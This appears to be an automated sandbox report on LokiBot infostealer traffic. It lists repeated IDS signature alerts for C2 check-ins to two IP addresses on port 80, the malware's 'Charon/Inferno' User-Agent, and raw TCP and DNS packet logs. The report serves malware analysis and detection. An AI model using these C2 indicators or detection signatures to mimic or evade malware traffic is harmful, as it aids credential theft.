10/14/21-08:29:36.968309	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49883	80	192.168.2.6	104.21.62.32
10/14/21-08:29:36.968309	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49883	80	192.168.2.6	104.21.62.32
10/14/21-08:29:36.968309	TCP	2025381	ET TROJAN LokiBot Checkin	49883	80	192.168.2.6	104.21.62.32
10/14/21-08:29:36.968309	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49883	80	192.168.2.6	104.21.62.32
10/14/21-08:29:38.139186	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49890	80	192.168.2.6	104.21.62.32
10/14/21-08:29:38.139186	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49890	80	192.168.2.6	104.21.62.32
10/14/21-08:29:38.139186	TCP	2025381	ET TROJAN LokiBot Checkin	49890	80	192.168.2.6	104.21.62.32
10/14/21-08:29:38.139186	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49890	80	192.168.2.6	104.21.62.32
10/14/21-08:29:39.373198	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49897	80	192.168.2.6	104.21.62.32
10/14/21-08:29:39.373198	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49897	80	192.168.2.6	104.21.62.32
10/14/21-08:29:39.373198	TCP	2025381	ET TROJAN LokiBot Checkin	49897	80	192.168.2.6	104.21.62.32
10/14/21-08:29:39.373198	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49897	80	192.168.2.6	104.21.62.32
10/14/21-08:29:40.707681	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49905	80	192.168.2.6	172.67.219.104
10/14/21-08:29:40.707681	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49905	80	192.168.2.6	172.67.219.104
10/14/21-08:29:40.707681	TCP	2025381	ET TROJAN LokiBot Checkin	49905	80	192.168.2.6	172.67.219.104
10/14/21-08:29:40.707681	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49905	80	192.168.2.6	172.67.219.104
10/14/21-08:29:41.873661	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49910	80	192.168.2.6	104.21.62.32
10/14/21-08:29:41.873661	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49910	80	192.168.2.6	104.21.62.32
10/14/21-08:29:41.873661	TCP	2025381	ET TROJAN LokiBot Checkin	49910	80	192.168.2.6	104.21.62.32
10/14/21-08:29:41.873661	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49910	80	192.168.2.6	104.21.62.32
10/14/21-08:29:43.281959	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49911	80	192.168.2.6	104.21.62.32
10/14/21-08:29:43.281959	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49911	80	192.168.2.6	104.21.62.32
10/14/21-08:29:43.281959	TCP	2025381	ET TROJAN LokiBot Checkin	49911	80	192.168.2.6	104.21.62.32
10/14/21-08:29:43.281959	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49911	80	192.168.2.6	104.21.62.32
10/14/21-08:29:44.429017	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49912	80	192.168.2.6	172.67.219.104
10/14/21-08:29:44.429017	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49912	80	192.168.2.6	172.67.219.104
10/14/21-08:29:44.429017	TCP	2025381	ET TROJAN LokiBot Checkin	49912	80	192.168.2.6	172.67.219.104
10/14/21-08:29:44.429017	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49912	80	192.168.2.6	172.67.219.104
10/14/21-08:29:45.763145	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49913	80	192.168.2.6	172.67.219.104
10/14/21-08:29:45.763145	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49913	80	192.168.2.6	172.67.219.104
10/14/21-08:29:45.763145	TCP	2025381	ET TROJAN LokiBot Checkin	49913	80	192.168.2.6	172.67.219.104
10/14/21-08:29:45.763145	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49913	80	192.168.2.6	172.67.219.104
10/14/21-08:29:46.923367	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49914	80	192.168.2.6	172.67.219.104
10/14/21-08:29:46.923367	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49914	80	192.168.2.6	172.67.219.104
10/14/21-08:29:46.923367	TCP	2025381	ET TROJAN LokiBot Checkin	49914	80	192.168.2.6	172.67.219.104
10/14/21-08:29:46.923367	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49914	80	192.168.2.6	172.67.219.104
10/14/21-08:29:48.049871	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49915	80	192.168.2.6	172.67.219.104
10/14/21-08:29:48.049871	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49915	80	192.168.2.6	172.67.219.104
10/14/21-08:29:48.049871	TCP	2025381	ET TROJAN LokiBot Checkin	49915	80	192.168.2.6	172.67.219.104
10/14/21-08:29:48.049871	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49915	80	192.168.2.6	172.67.219.104
10/14/21-08:29:49.324402	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49916	80	192.168.2.6	172.67.219.104
10/14/21-08:29:49.324402	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49916	80	192.168.2.6	172.67.219.104
10/14/21-08:29:49.324402	TCP	2025381	ET TROJAN LokiBot Checkin	49916	80	192.168.2.6	172.67.219.104
10/14/21-08:29:49.324402	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49916	80	192.168.2.6	172.67.219.104
10/14/21-08:29:51.880554	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49918	80	192.168.2.6	104.21.62.32
10/14/21-08:29:51.880554	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49918	80	192.168.2.6	104.21.62.32
10/14/21-08:29:51.880554	TCP	2025381	ET TROJAN LokiBot Checkin	49918	80	192.168.2.6	104.21.62.32
10/14/21-08:29:51.880554	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49918	80	192.168.2.6	104.21.62.32
10/14/21-08:29:55.836603	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49921	80	192.168.2.6	172.67.219.104
10/14/21-08:29:55.836603	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49921	80	192.168.2.6	172.67.219.104
10/14/21-08:29:55.836603	TCP	2025381	ET TROJAN LokiBot Checkin	49921	80	192.168.2.6	172.67.219.104
10/14/21-08:29:55.836603	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49921	80	192.168.2.6	172.67.219.104
10/14/21-08:29:56.968340	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49923	80	192.168.2.6	104.21.62.32
10/14/21-08:29:56.968340	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49923	80	192.168.2.6	104.21.62.32
10/14/21-08:29:56.968340	TCP	2025381	ET TROJAN LokiBot Checkin	49923	80	192.168.2.6	104.21.62.32
10/14/21-08:29:56.968340	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49923	80	192.168.2.6	104.21.62.32
10/14/21-08:29:58.074973	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49924	80	192.168.2.6	104.21.62.32
10/14/21-08:29:58.074973	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49924	80	192.168.2.6	104.21.62.32
10/14/21-08:29:58.074973	TCP	2025381	ET TROJAN LokiBot Checkin	49924	80	192.168.2.6	104.21.62.32
10/14/21-08:29:58.074973	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49924	80	192.168.2.6	104.21.62.32
10/14/21-08:29:59.226831	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49925	80	192.168.2.6	172.67.219.104
10/14/21-08:29:59.226831	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49925	80	192.168.2.6	172.67.219.104
10/14/21-08:29:59.226831	TCP	2025381	ET TROJAN LokiBot Checkin	49925	80	192.168.2.6	172.67.219.104
10/14/21-08:29:59.226831	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49925	80	192.168.2.6	172.67.219.104
10/14/21-08:30:00.311329	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49926	80	192.168.2.6	104.21.62.32
10/14/21-08:30:00.311329	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49926	80	192.168.2.6	104.21.62.32
10/14/21-08:30:00.311329	TCP	2025381	ET TROJAN LokiBot Checkin	49926	80	192.168.2.6	104.21.62.32
10/14/21-08:30:00.311329	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49926	80	192.168.2.6	104.21.62.32
10/14/21-08:30:01.416467	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49927	80	192.168.2.6	104.21.62.32
10/14/21-08:30:01.416467	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49927	80	192.168.2.6	104.21.62.32
10/14/21-08:30:01.416467	TCP	2025381	ET TROJAN LokiBot Checkin	49927	80	192.168.2.6	104.21.62.32
10/14/21-08:30:01.416467	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49927	80	192.168.2.6	104.21.62.32
10/14/21-08:30:02.546683	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49928	80	192.168.2.6	104.21.62.32
10/14/21-08:30:02.546683	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49928	80	192.168.2.6	104.21.62.32
10/14/21-08:30:02.546683	TCP	2025381	ET TROJAN LokiBot Checkin	49928	80	192.168.2.6	104.21.62.32
10/14/21-08:30:02.546683	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49928	80	192.168.2.6	104.21.62.32
10/14/21-08:30:03.716523	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49929	80	192.168.2.6	172.67.219.104
10/14/21-08:30:03.716523	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49929	80	192.168.2.6	172.67.219.104
10/14/21-08:30:03.716523	TCP	2025381	ET TROJAN LokiBot Checkin	49929	80	192.168.2.6	172.67.219.104
10/14/21-08:30:03.716523	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49929	80	192.168.2.6	172.67.219.104
10/14/21-08:30:04.877321	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49930	80	192.168.2.6	172.67.219.104
10/14/21-08:30:04.877321	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49930	80	192.168.2.6	172.67.219.104
10/14/21-08:30:04.877321	TCP	2025381	ET TROJAN LokiBot Checkin	49930	80	192.168.2.6	172.67.219.104
10/14/21-08:30:04.877321	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49930	80	192.168.2.6	172.67.219.104
10/14/21-08:30:05.956296	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49931	80	192.168.2.6	172.67.219.104
10/14/21-08:30:05.956296	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49931	80	192.168.2.6	172.67.219.104
10/14/21-08:30:05.956296	TCP	2025381	ET TROJAN LokiBot Checkin	49931	80	192.168.2.6	172.67.219.104
10/14/21-08:30:05.956296	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49931	80	192.168.2.6	172.67.219.104
10/14/21-08:30:07.140644	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49932	80	192.168.2.6	172.67.219.104
10/14/21-08:30:07.140644	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49932	80	192.168.2.6	172.67.219.104
10/14/21-08:30:07.140644	TCP	2025381	ET TROJAN LokiBot Checkin	49932	80	192.168.2.6	172.67.219.104
10/14/21-08:30:07.140644	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49932	80	192.168.2.6	172.67.219.104
10/14/21-08:30:08.437281	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49933	80	192.168.2.6	104.21.62.32
10/14/21-08:30:08.437281	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49933	80	192.168.2.6	104.21.62.32
10/14/21-08:30:08.437281	TCP	2025381	ET TROJAN LokiBot Checkin	49933	80	192.168.2.6	104.21.62.32
10/14/21-08:30:08.437281	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49933	80	192.168.2.6	104.21.62.32
10/14/21-08:30:09.692348	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49934	80	192.168.2.6	172.67.219.104
10/14/21-08:30:09.692348	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49934	80	192.168.2.6	172.67.219.104
10/14/21-08:30:09.692348	TCP	2025381	ET TROJAN LokiBot Checkin	49934	80	192.168.2.6	172.67.219.104
10/14/21-08:30:09.692348	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49934	80	192.168.2.6	172.67.219.104
10/14/21-08:30:11.132684	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49935	80	192.168.2.6	104.21.62.32
10/14/21-08:30:11.132684	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49935	80	192.168.2.6	104.21.62.32
10/14/21-08:30:11.132684	TCP	2025381	ET TROJAN LokiBot Checkin	49935	80	192.168.2.6	104.21.62.32
10/14/21-08:30:11.132684	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49935	80	192.168.2.6	104.21.62.32
10/14/21-08:30:13.066124	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49936	80	192.168.2.6	172.67.219.104
10/14/21-08:30:13.066124	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49936	80	192.168.2.6	172.67.219.104
10/14/21-08:30:13.066124	TCP	2025381	ET TROJAN LokiBot Checkin	49936	80	192.168.2.6	172.67.219.104
10/14/21-08:30:13.066124	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49936	80	192.168.2.6	172.67.219.104
10/14/21-08:30:15.336416	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49937	80	192.168.2.6	104.21.62.32
10/14/21-08:30:15.336416	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49937	80	192.168.2.6	104.21.62.32
10/14/21-08:30:15.336416	TCP	2025381	ET TROJAN LokiBot Checkin	49937	80	192.168.2.6	104.21.62.32
10/14/21-08:30:15.336416	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49937	80	192.168.2.6	104.21.62.32
10/14/21-08:30:16.682402	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49938	80	192.168.2.6	172.67.219.104
10/14/21-08:30:16.682402	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49938	80	192.168.2.6	172.67.219.104
10/14/21-08:30:16.682402	TCP	2025381	ET TROJAN LokiBot Checkin	49938	80	192.168.2.6	172.67.219.104
10/14/21-08:30:16.682402	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49938	80	192.168.2.6	172.67.219.104
10/14/21-08:30:18.312437	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49939	80	192.168.2.6	172.67.219.104
10/14/21-08:30:18.312437	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49939	80	192.168.2.6	172.67.219.104
10/14/21-08:30:18.312437	TCP	2025381	ET TROJAN LokiBot Checkin	49939	80	192.168.2.6	172.67.219.104
10/14/21-08:30:18.312437	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49939	80	192.168.2.6	172.67.219.104

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 08:28:19.027772903 CEST	49779	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:19.043910027 CEST	80	49779	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:19.044029951 CEST	49779	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:19.047157049 CEST	49779	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:19.063246012 CEST	80	49779	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:19.063373089 CEST	49779	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:19.079444885 CEST	80	49779	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:19.209945917 CEST	80	49779	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:19.210149050 CEST	49779	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:19.214078903 CEST	80	49779	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:19.214210033 CEST	49779	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:19.226104975 CEST	80	49779	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:20.327538013 CEST	49780	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:20.343683004 CEST	80	49780	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:20.343846083 CEST	49780	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:20.347126961 CEST	49780	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:20.363301039 CEST	80	49780	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:20.363467932 CEST	49780	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:20.379602909 CEST	80	49780	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:20.460792065 CEST	80	49780	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:20.461388111 CEST	49780	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:20.463710070 CEST	80	49780	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:20.463839054 CEST	49780	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:20.477552891 CEST	80	49780	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:21.319694996 CEST	49781	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:21.335665941 CEST	80	49781	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:21.335860968 CEST	49781	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:21.339482069 CEST	49781	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:21.355335951 CEST	80	49781	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:21.355484962 CEST	49781	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:21.371328115 CEST	80	49781	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:21.535239935 CEST	80	49781	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:21.535434008 CEST	49781	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:21.539542913 CEST	80	49781	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:21.539675951 CEST	49781	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:21.551295042 CEST	80	49781	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:22.573314905 CEST	49782	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:22.589943886 CEST	80	49782	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:22.590146065 CEST	49782	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:22.592927933 CEST	49782	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:22.609252930 CEST	80	49782	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:22.609401941 CEST	49782	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:22.625505924 CEST	80	49782	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:22.751913071 CEST	80	49782	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:22.752219915 CEST	49782	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:22.755004883 CEST	80	49782	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:22.755127907 CEST	49782	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:22.769331932 CEST	80	49782	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:23.772778034 CEST	49783	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:23.789092064 CEST	80	49783	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:23.789271116 CEST	49783	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:23.792481899 CEST	49783	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:23.808448076 CEST	80	49783	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:23.808618069 CEST	49783	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:23.826692104 CEST	80	49783	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:23.945936918 CEST	80	49783	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:23.946243048 CEST	49783	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:23.950661898 CEST	80	49783	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:23.950746059 CEST	49783	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:23.962250948 CEST	80	49783	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:24.866316080 CEST	49784	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:24.882256985 CEST	80	49784	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:24.882406950 CEST	49784	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:24.885116100 CEST	49784	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:24.901065111 CEST	80	49784	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:24.901196003 CEST	49784	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:24.917064905 CEST	80	49784	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:25.039886951 CEST	80	49784	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:25.040055990 CEST	49784	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:25.044074059 CEST	80	49784	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:25.044162989 CEST	49784	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:25.055864096 CEST	80	49784	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:26.004973888 CEST	49785	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:26.021157980 CEST	80	49785	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:26.021306992 CEST	49785	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:26.025161982 CEST	49785	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:26.041219950 CEST	80	49785	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:26.041390896 CEST	49785	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:26.057322979 CEST	80	49785	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:26.179322958 CEST	80	49785	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:26.184068918 CEST	80	49785	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:26.184221983 CEST	49785	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:26.233534098 CEST	49785	80	192.168.2.6	104.21.62.32
Oct 14, 2021 08:28:26.249512911 CEST	80	49785	104.21.62.32	192.168.2.6
Oct 14, 2021 08:28:27.318810940 CEST	49786	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:27.334852934 CEST	80	49786	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:27.337574005 CEST	49786	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:27.340971947 CEST	49786	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:27.356816053 CEST	80	49786	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:27.357132912 CEST	49786	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:27.372992039 CEST	80	49786	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:27.495248079 CEST	80	49786	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:27.495812893 CEST	49786	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:27.502477884 CEST	80	49786	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:27.502729893 CEST	49786	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:27.511775017 CEST	80	49786	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:30.268244028 CEST	49787	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:30.285348892 CEST	80	49787	172.67.219.104	192.168.2.6
Oct 14, 2021 08:28:30.285460949 CEST	49787	80	192.168.2.6	172.67.219.104
Oct 14, 2021 08:28:30.289741993 CEST	49787	80	192.168.2.6	172.67.219.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 08:28:18.981506109 CEST	60342	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:19.010951996 CEST	53	60342	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:20.304617882 CEST	61346	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:20.325933933 CEST	53	61346	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:21.290359974 CEST	51774	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:21.317846060 CEST	53	51774	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:22.530085087 CEST	56023	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:22.570988894 CEST	53	56023	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:23.741621971 CEST	58384	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:23.760160923 CEST	53	58384	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:24.836807966 CEST	60261	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:24.865097046 CEST	53	60261	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:25.974273920 CEST	56061	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:26.003031015 CEST	53	56061	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:27.298286915 CEST	58336	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:27.316716909 CEST	53	58336	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:30.236521959 CEST	53781	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:30.266340971 CEST	53	53781	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:31.345115900 CEST	54064	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:31.363276005 CEST	53	54064	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:32.470803976 CEST	52811	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:32.486987114 CEST	53	52811	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:33.632031918 CEST	55299	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:33.648431063 CEST	53	55299	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:34.851088047 CEST	63745	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:34.869492054 CEST	53	63745	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:35.953857899 CEST	50055	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:35.970498085 CEST	53	50055	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:37.063189983 CEST	61374	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:37.092448950 CEST	53	61374	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:38.346430063 CEST	50339	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:38.365737915 CEST	53	50339	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:39.473190069 CEST	63307	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:39.491631031 CEST	53	63307	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:41.046897888 CEST	54982	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:41.065442085 CEST	53	54982	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:42.234715939 CEST	50010	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:42.252979994 CEST	53	50010	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:43.827435970 CEST	63718	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:43.845922947 CEST	53	63718	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:45.159775019 CEST	62116	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:45.178029060 CEST	53	62116	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:48.000888109 CEST	63816	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:48.019318104 CEST	53	63816	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:49.619648933 CEST	55014	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:49.638375998 CEST	53	55014	8.8.8.8	192.168.2.6
Oct 14, 2021 08:28:50.931046009 CEST	62208	53	192.168.2.6	8.8.8.8
Oct 14, 2021 08:28:50.949512959 CEST	53	62208	8.8.8.8	192.168.2.6
